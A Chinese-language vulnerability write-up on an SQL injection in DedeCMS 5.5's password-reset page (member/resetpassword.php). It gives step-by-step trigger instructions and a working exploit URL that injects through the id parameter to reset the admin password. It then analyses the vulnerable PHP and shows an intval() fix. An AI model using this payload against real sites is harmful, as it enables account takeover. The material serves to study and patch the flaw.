catalog
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
DEDEcms SQL注入漏洞导致可以修改任意用户密码
2. 漏洞触发条件
1. 注册一个用户 2. 找回密码,选择通过安全问题取回: http://localhost/dedecms5.5/member/resetpassword.php 3. 填写完毕信息之后点击确认 4. 然后点击确认,会跳转到这样一个URL上: http://localhost/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=2&key=zPnruOY7 //黑客就可以构造EXP如下 http://127.0.0.1/dedecms5.5/member/resetpassword.php?dopost=getpasswd&id=xx' or userid='admin' and '2&key=zPnruOY7&setp=2&pwd=111222&pwdok=111222 //把上面url中的2改成之前跳转到链接的id参数,然后把key也改成之前跳转的链接的key参数 //然后userid可以修改成你需要修改密码的用户: admin //pwd和pwdok就是需要修改成的密码必须保持一样: md5(111222)=00b7691d86d96aebd21dd9e138f90840
修改成功
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2010-042167
3. 漏洞影响范围
4. 漏洞代码分析
/member/resetpassword.php
.. elseif($dopost == "getpasswd") { //修改密码 if(empty($id)) { ShowMsg("对不起,请不要非法提交","login.php"); exit(); } //只匹配出了所有的数字 $mid = ereg_replace("[^0-9]","",$id); $row = $db->GetOne("Select * From #@__pwd_tmp where mid = '$mid'"); if(empty($row)) { ShowMsg("对不起,请不要非法提交","login.php"); exit(); } if(empty($setp)) { $tptim= (60*60*24*3); $dtime = time(); if($dtime - $tptim > $row['mailtime']) { $db->executenonequery("DELETE FROM `#@__pwd_tmp` WHERE `md` = '$id';"); ShowMsg("对不起,临时密码修改期限已过期","login.php"); exit(); } require_once(dirname(__FILE__)."/templets/resetpassword2.htm"); } //攻击poc进入这个流支 elseif($setp == 2) { if(isset($key)) { $pwdtmp = $key; } $sn = md5(trim($pwdtmp)); if($row['pwd'] == $sn) { if($pwd != "") { if($pwd == $pwdok) { $pwdok = md5($pwdok); $sql = "DELETE FROM `#@__pwd_tmp` WHERE `mid` = '$id';"; $db->executenonequery($sql); //$id没有经过任何过滤就带入了SQL查询,导致了update注入 $sql = "UPDATE `#@__member` SET `pwd` = '$pwdok' WHERE `mid` = '$id';"; if($db->executenonequery($sql)) ..
5. 防御方法
/member/resetpassword.php
/* 对$id变量进行规范化 */ $id = isset($id)? intval($id) : 0; /* */
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved